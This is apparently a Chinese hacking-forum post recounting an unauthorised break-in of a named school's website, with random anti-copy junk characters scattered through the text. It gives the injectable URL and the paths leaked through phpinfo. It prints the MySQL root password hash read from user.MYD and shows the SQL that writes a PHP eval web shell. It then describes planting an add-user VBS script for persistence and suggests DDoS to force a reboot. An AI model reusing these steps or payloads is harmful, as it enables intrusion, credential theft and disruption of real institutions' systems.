友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
1 U, ]- m  ^0 `! b发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
( v( C5 s) ~3 _! J. x7 F

# H8 Y2 N; T6 O4 j/ r/ S/ K
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：
4 B- Y8 J6 r* G0 C5 J6 S

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
3 e7 t" ^6 \3 U' S8 {/ g
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
" A* @, l* _( {0 E- H( P2./phpMyAdmin/phpinfo.php  
3./load_file()  
5 H! O) C. u7 }# O# }9 K4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
0 X2 H% ]0 g/ |0 n% w
4 t; b, `7 l: K* t. x均不行...........................
2 f( t, E: n5 G
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

! ^  _3 D! P  w权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
! H1 ]/ V2 P. N# `. B
8 r! W, |. Q* V1 \- k; A默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
- N+ G: L* ]; I5 d+ ?6 H( y& ~
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
+ m+ [7 M/ M0 f$ Q$ c- p# h- p& O
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

+ _+ n" f' U1 [- Qhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

: Y" [3 Z5 w3 l& i' ~成功读到root密码：
6 v. a* a/ j; S
% y0 _% \2 A2 J  b, T) l: z# x/ Y7 C5 Y17---- r(0072)
18---- o(006f)
" }6 d# L* T/ Q- |, u% t19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
$ X/ }- m: P9 Y0 O3 k" o& l/ `23---- 2(0032)
24---- E(0045)
' W9 Y# |; C0 P  L/ W; e1 S25---- 1(0031)
0 f- I' D4 k( V3 [+ a26---- C(0043)
- C5 U5 M2 E% P! C! O27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
% t( }: k* \: I* l5 I5 ^  _30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
1 f) G3 ^2 r, ^" \) e+ u0 y34---- 5(0035)
4 X; H+ `5 ~2 H35---- 4(0034)
- s& K0 S. P+ t" O36---- 8(0038)
37---- 6(0036)
  M- [8 ]+ |' f, B1 G# n0 a* d: d" ]38---- 4(0034)
! H% O5 F. G2 c$ z39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
; p1 ?2 x1 [9 k, }45---- 9(0039)
46---- 8(0038)
5 c3 A( J# H  x+ [$ ?! Q. T47---- F(0046)
48---- F(0046)
49---- 4(0034)
+ g. }! Z5 l6 G- [- f; x/ l/ ?50---- F(0046)
9 O( H; W8 Y5 r4 k51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
% O: r! R1 v: _% S# B) X) f, i54---- A(0041)
55---- 4(0034)
56---- A(0041)
! ~9 z2 y2 p$ O- D9 M57---- B(0042)
; m  p8 h% v8 N2 x  v  F/ T58---- *(0044)
2 h/ q$ L) y7 v( W: C: {59---- *(0035)
60---- *(0041)
2 f" x& l4 ^. h7 S4 o) _* h61---- *0032)
  ?, m0 H& g* `7 R- C. n7 l- X( @: y3 c% e
解密后成功登陆phpmyamin
                          

                             

  T! B4 X; _) X7 x0 q$ D; [# q找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
; a. p8 R+ Q2 [/ i0 Q
成功执行，拿下shell，菜刀连接：
& m, @$ `( x; e* C
9 C* K# D: W4 C3 A6 B. h9 E服务器不支持asp,aspx,php提权无果...................

' [$ z( [. C) Y2 F7 E: T但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
4 N- y1 U8 T; y; \, A' ~( i

服务器上已经有个隐藏帐号了

+ o: Z: C7 j: o5 H1 Y! i

别名     administrators
$ O" h0 x8 \$ v1 s; x& A7 b# S注释     管理员对计算机/域有不受限制的完全访问权

成员

8 M' g. a' {3 {6 }5 _' f7 x

-------------------------------------------------------------------------------
; i* Y. ^8 \" q5 E! i0 g0 Sadmin
Administrator
0 o0 C$ t" q% @" J( S+ bslipper$
3 K9 {3 p& W& y& Lsqluser
" |1 \7 |2 m' t! [2 o命令成功完成。

+ t( U0 f1 z1 _% g; n" H服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
, G( ]) F' O. R# A) r1 o$ V; E& G
ddos服务器重启，不然就只能坐等服务器重启了...............................
: g) Z8 j, m1 N
* y/ D6 `4 B! W3 T5 R! N' h      

angel